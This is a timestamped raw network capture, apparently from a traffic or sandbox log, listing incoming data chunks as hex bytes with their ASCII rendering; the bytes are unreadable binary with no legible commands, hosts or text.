                                                                                                                                                    2022-09-29 12:59:22 UTC31153INData Raw: 9e a4 23 34 cf 20 ad b9 4a a8 00 8a c1 c3 15 5a 42 7a 1d 06 a8 ff 2f ac 4a 30 03 0d a5 d7 07 8e ab b8 c9 8c 36 78 d7 9b 42 e8 97 71 31 08 18 54 74 10 af 06 fb 06 dc 41 2a 23 a7 f7 a4 23 c4 cd 08 fc f4 62 cc f0 cd a9 b4 9a 78 49 cf 96 8a 43 aa 53 99 c4 33 15 ab 1f e6 44 71 dc 89 b3 7b 86 56 18 a2 bc a6 9b 33 32 93 16 0a 7b 63 b8 44 08 d9 be 21 59 65 64 d9 76 79 67 68 a8 41 af e1 27 aa de ae 46 ea be be 9d 52 f9 50 aa 8b 47 48 45 2d f4 f6 15 17 8d 0c e8 68 5a 99 36 dc d0 8d e9 1f 30 7b 3c b6 84 93 c9 82 41 a9 ce a4 08 5b dc 9a 21 38 00 04 a9 dc 2c dc da ae a9 4b 73 28 4e b9 ab 9e f1 43 f7 20 26 cc 0d 78 fe 23 2b c5 03 d6 85 42 87 b8 50 be 55 b2 83 0b 2d 3d 22 f1 1e 2d 9c 50 1f cd 22 19 26 08 b1 a3 2f 9f 19 05 0c 10 6c 33 51 a6 c3 9b 1e ff e6 01 65 c2 5c 8e
                                                                                                                                                    Data Ascii: #4 JZBz/J06xBq1TtA*##bxICS3Dq{V32{cD!YedvyghA'FRPGHE-hZ60{<A[!8,Ks(NC &x#+BPU-="-P"&/l3Qe\
                                                                                                                                                    2022-09-29 12:59:22 UTC31169INData Raw: 54 0f f7 28 af 67 d9 93 2e e6 8d b5 b9 6b 5b b4 af 41 68 d4 12 f1 1f 44 1c e1 52 25 15 cf 58 b1 a3 8c c9 5d 15 7d f0 c9 b5 25 47 12 02 f7 03 97 1a f0 d5 ae de 35 ed 19 e6 eb ca 0b cc 3d 7c 40 64 64 f5 54 ee e9 02 92 24 42 69 7a e1 3a 35 49 7a df 22 98 b7 fa b9 05 b3 25 d8 27 38 6f 4f 4d bd 46 0b 56 24 e8 39 a2 07 5c 31 81 ec 39 49 66 34 8f b8 72 ef f1 e0 7c f0 26 1b c2 e6 99 79 5f 91 9b 3f be 29 82 81 bb 11 c8 c5 d5 19 30 4f 73 1d 1d dd 3a 56 d5 c4 20 54 1a fa 35 a4 e5 a8 e0 38 e4 5d 4f da 06 5d 72 49 02 90 ed 19 de c7 ec 09 7d 08 2b e9 41 e5 b6 b0 b2 92 37 27 ff 04 42 40 fd f1 76 a6 73 d3 68 57 7b e2 58 8d e3 16 71 7a 39 fe c5 81 ee 01 f1 97 e7 0d 5e a9 93 d9 a3 e3 b1 73 ad 2b a8 61 07 2e 0f 87 3b f7 ea ab 80 55 4c 0e 8b f5 b4 9f a1 ca bc 6b c5 af c2 ff
                                                                                                                                                    Data Ascii: T(g.k[AhDR%X]}%G5=|@ddT$Biz:5Iz"%'8oOMFV$9\19If4r|&y_?)0Os:V T58]O]rI}+A7'B@vshW{Xqz9^s+a.;ULk
                                                                                                                                                    2022-09-29 12:59:22 UTC31185INData Raw: 31 37 6e 0a 67 ff b1 a4 4b 91 03 00 01 aa c0 0d 16 ec a1 27 14 f4 35 f6 91 2d a7 2c 29 d6 d9 22 a2 ce 24 d9 a4 66 8c 68 d3 73 d4 5d 78 3d bf db 1a 81 2d 65 95 62 84 e6 e7 94 23 60 72 2f 97 5a 09 9d d3 82 cd cf 9c cf 3e f1 69 10 a9 9f 54 7c 0e 79 22 57 b3 b8 60 9d 5a 82 b2 ee 8b 11 61 6f 6e 82 e7 63 45 02 56 cd 03 c8 eb 35 e2 a7 6b bb b5 bb ce 46 b8 3c 1f be eb be ca 7d 1e 58 81 ba 39 89 2a 27 eb f5 cc 31 37 90 08 9f 54 ea b3 2d 32 07 13 0f da 22 bd 5d 17 17 8c ce e4 a0 c6 4b 32 88 c4 64 d5 36 88 9d 2d 23 f1 be aa 4e 28 e4 4a 85 17 d9 fe 1e 82 05 80 f3 80 f5 60 41 9d fb c0 2e 24 ed e7 13 13 e1 5a e6 a7 f5 b3 8f 5e 21 0c fe 8f 39 27 4b 19 40 69 fe f1 11 53 c0 ae 56 e6 1a 65 4f fe 06 4d 03 3b 33 20 c0 23 35 88 5b 6a a5 3f 92 49 da 9a ec 05 7c e1 cf 6c 68 d5
                                                                                                                                                    Data Ascii: 17ngK'5-,)"$fhs]x=-eb#`r/Z>iT|y"W`ZaoncEV5kF<}X9*'17T-2"]K2d6-#N(J`A.$Z^!9'K@iSVeOM;3 #5[j?I|lh
                                                                                                                                                    2022-09-29 12:59:22 UTC31201INData Raw: c5 c6 ec a8 9c fa a9 f0 a9 b9 8e dd 66 91 21 d4 0d ab f1 44 d7 eb 6b 64 b1 3f 70 9a cd 7f 28 5d 7b 02 55 8e 67 46 12 38 eb 73 66 b6 28 36 37 ac 22 f2 32 8d 3e 30 32 26 6f 19 bf 94 4f 3f 16 bb 3e d1 fb cb e8 7f 08 5e 5a 5a b6 bb 87 ce 3f b9 60 31 57 b6 86 71 39 5c 25 c9 99 64 14 cc 38 cc ba 10 eb e9 e2 d5 6b 36 41 19 cc 34 ab f7 01 d0 19 12 8a 44 d0 f2 28 8d 7d e2 be c5 fc 3d 48 02 d9 46 b4 15 c6 65 1e d2 36 c4 0b 72 8f 36 09 6c 94 4b bb 30 09 42 54 60 46 bb f5 d6 19 06 01 ba 02 d7 34 51 62 c8 99 a9 c8 91 ab e9 a9 39 b9 4f 9f 49 a0 6d d8 60 e5 09 c8 f2 f8 75 ca 5a 3c f9 f4 69 aa 43 74 69 d7 af 09 d4 df 9b 1f 2d e6 22 a4 de 6c 70 10 4b a8 b9 63 f5 96 e6 e3 aa 83 7b a1 34 1f e9 ae 2f 90 f8 32 26 56 00 5f 25 7e 63 ed b5 2f b6 e4 ae b3 04 84 49 79 da c3 b8 8b
                                                                                                                                                    Data Ascii: f!Dkd?p(]{UgF8sf(67"2>02&oO?>^ZZ?`1Wq9\%d8k6A4D(}=HFe6r6lK0BT`F4Qb9OIm`uZ<iCti-"lpKc{4/2&V_%~c/Iy
                                                                                                                                                    2022-09-29 12:59:22 UTC31217INData Raw: ba 9a 08 8d 44 af f5 16 40 8b df 6d 1b 9a 59 00 ff 59 b7 a1 b1 e9 6a 0a be c8 f2 0f 44 01 0d 2a 1a 99 98 b7 6c 82 ec 57 60 be 42 69 3b 00 a4 39 61 20 3e 3b 3e c7 d1 39 06 aa db b3 31 e1 44 d7 19 e6 e9 51 bd c6 ad 52 e2 99 12 0b a0 e6 79 d2 1a 94 ff 9c 13 15 6a 7c 1f b5 43 a5 1e 65 1c 04 7b 22 4c 87 c8 5e b5 07 5e 9c 27 6b f0 b3 36 92 dd ca cc 1f 46 30 d1 bb 14 53 b5 91 5e b9 14 98 90 12 f6 3a 5c 86 55 49 c1 5d 2f 2e bc 97 23 c0 12 76 f6 d4 0f 9b 1f 4d db 6c 88 03 ef dc 82 9b ec e6 3b 4d 68 56 de 84 b0 e8 0a ce 81 eb 57 3b e3 a6 5d 59 98 43 f7 70 2a b8 d2 e2 66 1f b8 02 5d 60 51 16 97 16 e2 ce ee 9b d8 de 74 9a 7d c9 0f e1 34 e7 4b dc 97 22 fa 96 4b 70 d4 10 a8 64 fb 02 16 a1 12 16 24 3f a7 c9 3a 77 60 32 71 80 c2 98 95 74 b7 e4 c3 68 7e 92 48 47 93 26 97
                                                                                                                                                    Data Ascii: D@mYYjD*lW`Bi;9a >;>91DQRyj|Ce{"L^^'k6F0S^:\UI]/.#vMl;MhVW;]YCp*f]`Qt}4K"Kpd$?:w`2qth~HG&
                                                                                                                                                    2022-09-29 12:59:22 UTC31233INData Raw: 93 f9 8a ee bf 88 f1 92 ff 43 e4 06 66 6c 12 96 b7 21 9b f5 bc d5 2a 71 89 85 7a a8 69 1d a3 9c f8 23 e0 b3 1f 6c 46 07 f9 f2 d3 b2 93 30 bd 87 39 94 0b e7 96 34 3e 66 d5 e0 50 f4 02 b1 61 1f ee a8 00 7d 37 07 bb 2d 62 c1 81 0d ab e3 35 a9 ba 4e ce bf cc 83 11 8e 29 bc 25 b7 12 f6 5d 84 97 40 8d 58 19 6f 49 51 43 b3 71 44 53 22 47 21 b3 5a ca 85 da e7 44 1f af 81 a2 44 c1 18 7a c1 23 78 04 ec e6 f4 9d e5 9f b0 5e 82 6d c3 ea 5c d9 f1 5b 0d e1 0a df ad 1b b3 13 46 81 a4 cf d9 b7 60 9b 54 e8 a5 a4 0b 95 38 24 11 b6 18 95 d3 1e 04 d3 c4 05 47 1e 4b d2 27 c0 52 b4 44 0c ff 53 47 1e 50 f8 f4 10 49 f6 03 3d d9 56 ac e2 79 5c 92 61 94 73 48 99 a7 04 b9 7e bf 8d b0 b3 b5 76 a3 c2 41 30 5e 2c 03 fc 36 d4 70 6e 9b 47 47 f2 fe 59 83 fd da 4e d4 f4 12 31 a5 66 90 07
                                                                                                                                                    Data Ascii: Cfl!*qzi#lF094>fPa}7-b5N)%]@XoIQCqDS"G!ZDDz#x^m\[F`T8$GK'RDSGPI=Vy\asH~vA0^,6pnGGYN1f
                                                                                                                                                    2022-09-29 12:59:22 UTC31249INData Raw: 88 64 da fc 56 d5 aa 08 71 c4 f2 d6 ee fb 78 5b ab 50 07 3a 0e 08 c9 c8 a7 e5 d7 f8 62 9d fc 2e 73 ab b6 91 cb 30 54 b4 07 93 bd 84 57 e2 65 7a d1 94 39 44 97 cd e0 da 13 e7 83 9e 1c f9 10 ed 2c e8 9a 06 0c a1 e8 a2 18 d0 a2 e0 50 29 68 60 57 23 ae 7b f2 91 17 7a 04 d5 db da dc d0 d0 c1 ed 44 e2 94 f1 34 6b fa 17 09 ed db c4 31 3c 62 44 2e a3 04 7f a3 0e c3 57 4a 42 57 1d 76 7b aa 91 f7 ad 84 42 e1 ad 84 c2 6c 03 80 7e 92 1f 45 52 30 1a db fd a1 02 d5 56 45 d0 09 d0 ea 51 66 7c c4 4d 51 d6 15 da 6a 17 1c a9 ca f9 c4 04 5a c2 84 b1 3c 2c d9 6d fb aa 0b 88 35 d2 3f ad 41 5e ec cf 16 41 a6 12 ff 1a 10 97 ae 49 c5 02 9f 09 8f a5 d1 50 95 5a d7 ce 17 a1 72 f4 8c 9a 54 3a 26 f4 33 47 34 bb 73 ab 41 20 ca fb 54 66 58 ad 32 ab 10 89 e2 63 1b a3 81 8d e2 2d de b5
                                                                                                                                                    Data Ascii: dVqx[P:b.s0TWez9D,P)h`W#{zD4k1<bD.WJBWv{Bl~ER0VEQf|MQjZ<,m5?A^AIPZrT:&3G4sA TfX2c-
                                                                                                                                                    2022-09-29 12:59:22 UTC31265INData Raw: c3 30 26 a7 ef d1 65 73 fa 74 d3 00 ac 4d bd 93 91 3e 71 2c 91 97 4b da 4f 6e 94 ce a6 b7 22 d3 fe a9 dd 5a 66 a5 c7 21 e0 fc a8 4c e6 d6 bb 77 8e 0d d5 e9 20 85 4d b3 a7 86 0c de 29 67 a9 97 69 24 84 e9 26 ee ca bc cd 72 4c 42 68 21 46 02 5d b7 ff 3c 76 97 3a 5f c6 57 98 80 36 51 41 78 98 cb 07 49 f3 e4 50 98 19 cb 8f 25 f2 71 6b 43 0a 9f e3 7a 98 47 f6 b8 1e 78 9f f7 f8 4b c6 49 94 03 ad c8 f9 43 5c 57 f7 cc b5 8b 0e db 26 c6 bc 93 bb 59 15 2e 23 8d 0a 09 e3 d0 9f 90 48 4e 76 9b 2c 4a 66 e2 20 d2 e1 51 cb c7 5f 4c c7 28 ac 99 4a 57 8a d6 b8 58 51 91 e1 ec 37 43 03 f4 a8 5e a3 91 15 14 e2 32 e1 2f 7a 31 21 ad 55 dc 31 68 21 68 0a 20 f3 4e 7a 2f bc a6 09 5e 62 39 29 44 01 ca 9f 7c ff 5b c1 6b 36 5b 2a 1b 99 d7 4f eb 9b 2d e4 58 58 e1 f0 be c1 98 e4 c7 c0
                                                                                                                                                    Data Ascii: 0&estM>q,KOn"Zf!Lw M)gi$&rLBh!F]<v:_W6QAxIP%qkCzGxKIC\W&Y.#HNv,Jf Q_L(JWXQ7C^2/z1!U1h!h Nz/^b9)D|[k6[*O-XX
                                                                                                                                                    2022-09-29 12:59:22 UTC31281INData Raw: 87 47 5f b7 27 7a b9 4b 88 1c 65 b5 9e dc 37 92 5c af c9 0a 99 74 af d0 5b 06 51 e5 fe c8 1e 8e 2b 36 2f 37 28 2f 77 fd cf 3c 65 a1 3a 3e 96 da 26 54 d2 be f5 64 b3 c4 e0 ac 70 20 37 61 8a 00 07 d8 d7 e9 7e 20 b0 cc a9 70 0e d2 49 c2 fc 60 96 b3 a0 77 7c cc 75 b8 d5 0c 43 9d 72 a6 9c e8 d4 d3 f2 a0 b3 4f 8c 3d 7d 6e 2e 7b f4 b0 96 e6 fe 7e 13 dc f9 4f 72 2b 41 67 84 61 cc 79 51 9d d3 27 93 a6 ac 5a 1b 6a 55 80 71 03 8c 0a 87 6e 53 24 f9 3b 57 62 a8 2a a0 49 13 cb 0f b5 17 ef dc 99 85 9e b3 53 92 b5 15 d1 02 b0 96 67 d8 94 e2 97 db cc 70 8e f7 de af aa a0 de 30 d7 20 2d e3 54 7e 9f 36 fb 2b 43 6e 91 f9 58 49 a0 dc 69 59 34 8b e4 24 1a 63 d9 53 bb bf 49 7d d5 39 d5 f8 84 8e a1 f4 16 53 12 4b 06 a1 7c 1c be 4d f7 46 78 de 3c 14 35 8d 95 d6 ae f8 95 21 2c 45
                                                                                                                                                    Data Ascii: G_'zKe7\t[Q+6/7(/w<e:>&Tdp 7a~ pI`w|uCrO=}n.{~Or+AgayQ'ZjUqnS$;Wb*ISgp0 -T~6+CnXIiY4$cSI}9SK|MFx<5!,E
                                                                                                                                                    2022-09-29 12:59:22 UTC31297INData Raw: 0c 76 76 ed d9 41 11 b8 01 83 18 11 41 3f a6 0a 44 52 91 6b cb a4 f7 44 60 ab a0 50 2a c9 96 7c 7c 6d a5 8d c1 54 89 5f 9b 87 61 89 f0 5b 06 36 02 c9 ba 7d e1 e2 96 db 98 da db 51 46 49 ce 91 98 b2 eb b6 e9 53 fd 6d 89 99 cd 59 56 32 c5 c0 99 83 ae ae 87 ad f7 2a 17 3b 91 f9 c9 bf 17 92 6e 0e fb 6d 89 08 ae 03 9f 83 d4 97 fa 1c 45 7b 7e 51 0f e7 ca 00 e1 a3 4d 6f 42 f3 a3 7a c4 12 fb ac 9f ac e1 e3 61 38 c0 1e 6f ed 4b d3 40 d4 ab 16 a7 d7 0e fa 11 7f 55 36 0d 2a 06 ec 96 2a 39 e2 cb ba 5c 58 3d 8e 46 40 44 4d cf 13 41 19 0f 01 e4 4f d4 31 69 a0 56 58 8c 63 a3 a4 67 1f 3c 1e d3 1d 88 ec e4 c1 0a 9b 86 1d 1b a7 24 56 f7 bb 90 4c 77 fc 43 cd 9b c3 dc a2 fb 8b ca 66 63 05 9c e5 89 7e 18 db ac 03 a2 9a 3e 90 77 72 9b ce 7c ea 0e fe d6 46 4d 8e 55 30 9d f2 cb
                                                                                                                                                    Data Ascii: vvAA?DRkD`P*||mT_a[6}QFISmYV2*;nmE{~QMoBza8oK@U6**9\X=F@DMAO1iVXcg<$VLwCfc~>wr|FMU0
                                                                                                                                                    2022-09-29 12:59:22 UTC31313INData Raw: be 53 51 5b 20 71 02 d2 ac 50 60 b2 e1 c3 46 fa 33 dd 73 17 d7 f6 64 5b 26 8c f4 9a 92 2d d9 30 1c 73 ee 43 9f 5f 05 b2 11 c0 9c d7 e7 67 17 24 43 1e 9c d2 a4 c7 08 18 f0 ab 67 7d 78 c4 bb b9 7d 59 56 51 a9 56 3a 90 76 53 f7 16 46 90 b1 17 56 6f ac 27 a0 ff ed 4a 15 3e 14 22 29 67 de 41 84 dc 63 d7 a4 6a 51 0b af f2 34 93 fc 9f 12 ee 1b b1 55 ac 10 99 d4 17 c3 30 8e 26 90 86 9e f7 c5 d8 0f 75 aa c6 3a 83 c5 a0 53 f7 4d 24 92 c1 60 d2 8c cf 84 20 67 31 29 58 a4 e3 8c 02 51 61 45 c2 8e ac 54 7a 65 d1 51 69 5e dc 79 aa aa 13 eb 2b ae bf 3b 7e e1 6a 19 33 7b 53 da 0e 85 5f f5 2e 70 4a fc 06 f5 13 09 7f c3 c2 77 0d ea 72 c5 54 45 ec bb eb a4 c6 8d 8e 6c 91 7e 53 b6 8f 9d 11 4b e6 c9 99 4c 60 12 57 42 c8 66 50 dc 65 aa 4b ff ec 5b 93 fd 6f 86 6e 46 b9 3a 21 70
                                                                                                                                                    Data Ascii: SQ[ qP`F3sd[&-0sC_g$Cg}x}YVQV:vSFVo'J>")gAcjQ4U0&u:SM$` g1)XQaETzeQi^y+;~j3{S_.pJwrTEl~SKL`WBfPeK[onF:!p
                                                                                                                                                    2022-09-29 12:59:22 UTC31329INData Raw: 44 13 a0 a1 9f 61 c6 9b 8b 20 b5 84 8e d9 7e 73 c0 43 2e 6d fa dd 9a bb 47 81 69 50 fb 87 1f 0e 0e 3c 69 df 75 5b 17 3e 45 11 9d a4 96 27 45 59 eb f2 5c 72 de c5 10 9c 6e e3 b9 ca fb c0 fa e8 fa 46 0b 79 0b 1e 88 4d b1 45 2a 56 96 ba c2 98 69 7f f0 b8 25 27 5e d6 a7 b7 16 9b be ff b8 e3 4a 33 a9 24 40 23 02 f4 18 16 52 31 21 af f4 d8 19 d7 74 61 38 22 6a 9f 24 37 e2 d0 18 b7 90 50 b0 ee c0 77 9b 10 3d a9 bc 1b 4b 3d 1a 86 1b 3c e6 f1 1a 2f 75 6f 14 30 32 a5 d6 0e eb 11 28 68 1c f4 ba bf 94 b3 f7 cd 22 f5 f0 04 61 9d 57 6d 91 51 a3 c6 0b de d4 db 08 ad 30 ba a5 b9 d5 5c 91 46 c5 c0 be 18 54 46 ea 8e 53 77 8d 73 96 92 48 fd d1 48 fa 74 35 1c b1 60 fc 9d a4 1b f5 99 f4 06 7c 90 ff 52 58 ea dd 60 e8 f5 23 67 20 71 6c f5 b7 f9 44 5f 95 2a b0 74 d9 96 bf 5d 1c
                                                                                                                                                    Data Ascii: Da ~sC.mGiP<iu[>E'EY\rnFyME*Vi%'^J3$@#R1!ta8"j$7Pw=K=</uo02(h"aWmQ0\FTFSwsHHt5`|RX`#g qlD_*t]
                                                                                                                                                    2022-09-29 12:59:22 UTC31345INData Raw: 9d 73 5c 1e df 5e 6c be b6 e5 10 fd c9 f1 fe ff 8f 89 bb a0 b6 4e c5 c8 cd d9 c1 70 8a 52 40 ca 7d 8c b1 f6 66 d8 1d 47 f9 e7 a1 22 5f 01 09 ca 85 6d c9 9e 8f 66 38 f3 c1 6f 0b 7f 9d d0 10 d3 67 35 d9 ef a7 92 25 b6 5e 84 e6 0c 5a 1e 2f 6a 64 c1 55 7b d7 89 05 76 26 b1 18 14 ab 8e ba 9d f2 f7 01 6b 2d 39 8a 9f c8 e4 56 93 ab e9 e0 7a e9 b1 2d f7 4a 98 68 36 a3 6a 0c a6 a5 28 c1 4a 62 3a 22 bb 2b 4f c2 72 25 02 09 79 73 fe e6 8a 82 bf f2 ab d4 7e 59 d8 af e6 74 20 ed ac b8 0b 8b 66 fc 3d a0 bf ae 19 ed a5 19 d3 d0 e8 5f 9c b2 0f 4d ae df 73 2d c9 92 52 e6 1a 87 5e e5 16 0c c1 63 50 16 33 b2 7f b4 5f b8 0b 8c 1e 6f 4f fe 5a a2 74 16 f9 cb 5f 89 d4 a2 3c fa 0a 72 d7 c7 75 7d 8c cc 1a 76 3a 7c 3f 5d 93 e8 8b c9 87 32 25 78 92 72 36 33 21 9c 8e 4b 4c 8f aa ff
                                                                                                                                                    Data Ascii: s\^lNpR@}fG"_mf8og5%^Z/jdU{v&k-9Vz-Jh6j(Jb:"+Or%ys~Yt f=_Ms-R^cP3_oOZt_<ru}v:|?]2%xr63!KL
                                                                                                                                                    2022-09-29 12:59:22 UTC31361INData Raw: 70 bb 8a 59 f9 da 2a 1a 60 3f 2f 29 68 9d de c3 63 c6 45 e9 c4 b6 27 aa 5a 38 59 bc 0d 18 ac 75 75 38 c3 fb 2b 80 08 3f 13 95 8e 96 1f f0 88 6d 7a 15 9f 35 45 55 3b 04 99 a2 54 4f 5f fa 12 30 7f fe 63 32 75 c6 5a b9 7c d3 a2 17 3b 74 22 73 ad 8d 01 c3 15 82 6b fc 8b 4b 33 0e f3 c4 dd c9 45 90 5a ac 01 3b b4 97 b8 db d2 71 58 dc 4b 91 9f e8 e7 b6 1d c5 86 a4 f4 4b 23 01 dd 52 3b d2 13 7a 49 ae e5 1c 78 b5 0c 41 5d b0 50 bd fc 08 96 9d b0 4d 2b 1c 19 99 37 10 6d 24 d8 ac 66 18 8d fc 50 e3 96 8f 7c d6 e1 cd a6 20 49 6e 37 17 73 b5 09 e6 0b ca 35 68 03 39 6b a6 8c fa 7c 74 c3 e8 99 82 d1 7e 49 7b f5 a7 e8 75 c2 42 e4 21 0a 1c f6 bc 36 dd b1 99 0b 52 6e ed a6 22 c7 01 53 97 8d 7b f9 5a 17 8a e4 54 01 e1 a6 cb d1 56 37 c2 81 c4 5c dd 36 dd 83 03 ea ba a3 c2 a3
                                                                                                                                                    Data Ascii: pY*`?/)hcE'Z8Yuu8+?mz5EU;TO_0c2uZ|;t"skK3EZ;qXKK#R;zIxA]PM+7m$fP| In7s5h9k|t~I{uB!6Rn"S{ZTV7\6
                                                                                                                                                    2022-09-29 12:59:22 UTC31377INData Raw: d9 b3 dc a2 77 40 b3 ff 0e 49 c9 7f 94 fd 79 58 13 b6 c3 61 12 6b 4b 73 48 f8 ef c5 e9 50 e6 5f 82 7c d2 15 1d e2 96 6d 52 0c 97 c5 41 88 62 93 3b 5c 19 9f ce bd c8 cb 6b 60 b8 a9 87 48 47 d7 98 f4 dd f3 d6 90 eb 0c 19 af 27 6d 91 eb 78 2e 58 0b 3f 57 98 fb 3e a3 5b 2d 35 2d 27 04 24 98 cf 47 97 c1 9d 0a 29 39 8e ce b1 4a 64 84 e2 a8 0b 5c 9b e7 85 17 13 02 3c 6d 9a f6 84 71 db 3b f6 55 d3 e7 da 3f 67 dc 18 23 b5 b4 79 b9 a1 11 60 c3 20 0e 79 34 0d f8 5d ad e9 4a 0f 23 94 98 4b 4f 0a 2d 6f cc f8 9e 3b ad f2 d7 5f 77 c0 ac 96 e4 4c ee 7c ce fe 7d 1c b0 b4 f6 5a 68 5a 94 17 fe cd 6d ed bc 13 0c 97 bf 96 20 1e c0 d1 88 54 81 bc 01 33 d0 82 91 90 fe c3 47 f7 3c db e7 26 98 96 56 1b e8 42 bc 74 60 ae eb 58 89 0a 76 8f c8 41 04 e2 0d 58 d7 ff 90 ee 25 93 47 ee
                                                                                                                                                    Data Ascii: w@IyXakKsHP_|mRAb;\k`HG'mx.X?W>[-5-'$G)9Jd\<mq;U?g#y` y4]J#KO-o;_wL|}ZhZm T3G<&VBt`XvAX%G
                                                                                                                                                    2022-09-29 12:59:22 UTC31393INData Raw: e7 e2 d4 b6 80 65 9d a4 9d 46 e4 39 04 6d 40 53 a2 2e c6 1b b7 4e 8e 5e 84 aa e2 aa f5 ca 60 8f 92 cf fe df e6 49 d2 3f fa d3 b4 7c 81 41 c6 2e fb c9 c4 1b c0 c5 bd 7e 0c 5d f5 f0 0e 9d 20 65 7a 2d ed 53 00 f0 60 d6 a7 85 f5 fd 3f f7 40 b1 a8 4d 49 d9 ed 28 11 11 2b a4 2e c2 b1 26 e9 aa 3e e4 27 f5 0b 34 c2 10 db da 77 5f 17 c5 ad 5d 18 71 31 5b ac 32 5c 02 d0 68 6e b5 9d d9 22 aa ba 21 25 0b 1d 1d 74 81 f3 ee 8d c0 21 bf a1 52 87 b6 f9 45 c3 57 7e c4 dd df 5d 8c f0 a3 f9 60 c7 a2 1a a2 94 08 7f cc 3b cd a8 f3 85 04 ea 39 52 70 98 de 0f a3 e5 8a 7c d6 bf 34 ae e2 42 a0 82 d1 48 61 82 0c d3 80 7f 85 4a a9 20 59 0e a4 39 92 a9 eb 79 76 57 79 b2 92 4c 66 49 be 6c ae 36 8f da f9 b1 46 5f 82 53 ba 59 8c 92 f7 e0 7f 7c 85 ad da dc 49 33 fc 12 14 77 91 85 10 a2
                                                                                                                                                    Data Ascii: eF9m@S.N^`I?|A.~] ez-S`?@MI(+.&>'4w_]q1[2\hn"!%t!REW~]`;9Rp|4BHaJ Y9yvWyLfIl6F_SY|I3w
                                                                                                                                                    2022-09-29 12:59:22 UTC31409INData Raw: 2c be 26 b0 c2 e3 57 28 ec 1a 87 a9 ad 08 e9 e4 d2 c3 5b 2f df 8d d4 52 d6 e1 a0 17 e4 b4 4e d1 11 85 66 9d b1 2f fe 01 52 8c 1b 6f 77 2a 15 fe 59 22 6c 0c e0 99 5c 4d 80 04 62 7a 95 99 a9 37 4b b8 9a 01 9f 41 57 a9 14 fa 90 72 ca 72 15 6d 2a 8b 28 6c d3 2e d4 5c 52 db 8d 53 c7 65 90 06 ea be 6c a6 0e 1e 21 8c c9 3e 8a 5a 4f 9c be cf f6 89 5a 7f dd 62 7f 28 ce 90 ea c2 91 ac db 36 a4 db 72 c9 80 63 c8 60 51 8c 0f ec 07 2b 9c d0 01 01 3d aa ce f7 96 77 3b 8a a6 e3 0e 28 91 23 79 07 2e 47 20 7e 18 a7 d1 f2 6e ba f8 eb 31 d0 98 f3 d4 de 6a 26 99 bd 84 f2 5e 75 d2 38 14 8c cb 19 7c 61 b0 ea 65 8d 7c 4b 89 d3 43 72 f5 cf 7f 6e 9b 38 ed 91 70 25 ec 09 90 01 47 71 73 2c 68 19 4d cc 56 3b fa 69 38 e4 9d 43 67 0c 35 da 15 5c ec 20 45 35 7d 1d 32 03 55 d0 18 2f 89
                                                                                                                                                    Data Ascii: ,&W([/RNf/Row*Y"l\Mbz7KAWrrm*(l.\RSel!>ZOZb(6rc`Q+=w;(#y.G ~n1j&^u8|ae|KCrn8p%Gqs,hMV;i8Cg5\ E5}2U/
                                                                                                                                                    2022-09-29 12:59:22 UTC31425INData Raw: c8 85 cc 6b 80 55 f3 e5 40 f4 52 b9 d2 69 ab 3a d6 dd 4b 50 d1 83 7b b1 2c b3 10 5c 08 b1 1f 60 7a 25 2c 40 1b b5 e0 3e 89 d1 fa 7a f0 1b 07 f3 6f f5 97 e5 78 48 b9 05 4b 6f fd 73 41 87 0c 02 2f 1c e5 96 1f 42 3d cc 9f 1d 6e b4 e9 63 f8 6f 50 1c 86 05 4e 3e be d8 64 5c e5 67 dd 8a dc 64 05 4e dc 3b 29 3e 85 92 aa 19 06 8e ed df 8e c6 90 b3 5a d2 cc d7 10 90 c3 c5 d3 9f 65 54 3b ba 55 f5 bd 56 76 93 b1 87 49 28 6a 88 99 72 c0 fd d9 bf a8 c3 8d 80 10 d9 e6 0d 1b 9b 62 32 9e 14 3b 61 ac e5 a6 c5 25 9d d9 af 19 ba 82 a7 65 8f c0 53 22 d5 2a b2 44 7f ca 04 4f ee f6 75 53 d9 fc a8 38 24 2e d3 66 25 9b 18 f9 b8 b6 d5 aa 65 ad 97 e5 70 8d e7 48 f6 4e 4e 86 50 79 ac 0b 10 b7 dd c5 31 3a 89 51 94 05 46 fa c3 26 29 50 a5 af 5e 4f 60 05 05 61 cd aa 3e fa 4b 53 b4 68
                                                                                                                                                    Data Ascii: kU@Ri:KP{,\`z%,@>zoxHKosA/B=ncoPN>d\gdN;)>ZeT;UVvI(jrb2;a%eS"*DOuS8$.f%epHNNPy1:QF&)P^O`a>KSh
                                                                                                                                                    2022-09-29 12:59:22 UTC31441INData Raw: b4 b3 d7 c9 fe d6 1b df 86 a6 ad ba 88 67 df a9 2d e7 62 50 6a 93 30 21 cc 9e cd 9d 52 e3 b6 40 6c 57 98 ab 58 3e 45 44 59 86 83 65 a3 ab 38 48 90 02 62 f6 72 22 48 38 af 28 fc 75 f6 f8 1d 34 a1 b3 07 b5 45 fd 7e e7 79 09 00 72 87 91 89 d8 8a 7d ce f3 6e 39 fc 52 25 e7 16 38 94 cf 11 e3 aa 0a 7f 88 87 09 70 3b f0 74 f6 12 be 23 c2 7d 83 61 6f 79 a2 0b 83 f0 c4 32 16 3b ab 2d f6 43 64 94 20 76 17 cf ff 9a 9a 9e ce f5 96 df 15 02 6f df f9 1c 46 7d cd 40 d9 f8 92 03 29 b9 b1 3f b0 49 3c 6b 09 3c 5d f0 68 94 58 11 bd aa cb 7c 46 83 36 14 a4 31 4c 89 4d b4 a3 d2 07 79 e5 ef ad a0 f0 83 2a 4f fb d6 3a 0c 65 52 db eb 81 aa 30 cc 2c b2 0d 85 1f 0b 7f 3d ec df 90 be 7c 31 91 47 17 eb c9 84 1f 53 53 fd ba e5 48 73 c9 87 f0 17 ed 5d 57 49 ec f0 39 88 d2 8d 7d e0 21
                                                                                                                                                    Data Ascii: g-bPj0!R@lWX>EDYe8Hbr"H8(u4E~yr}n9R%8p;t#}aoy2;-Cd voF}@)?I<k<]hX|F61LMy*O:eR0,=|1GSSHs]WI9}!
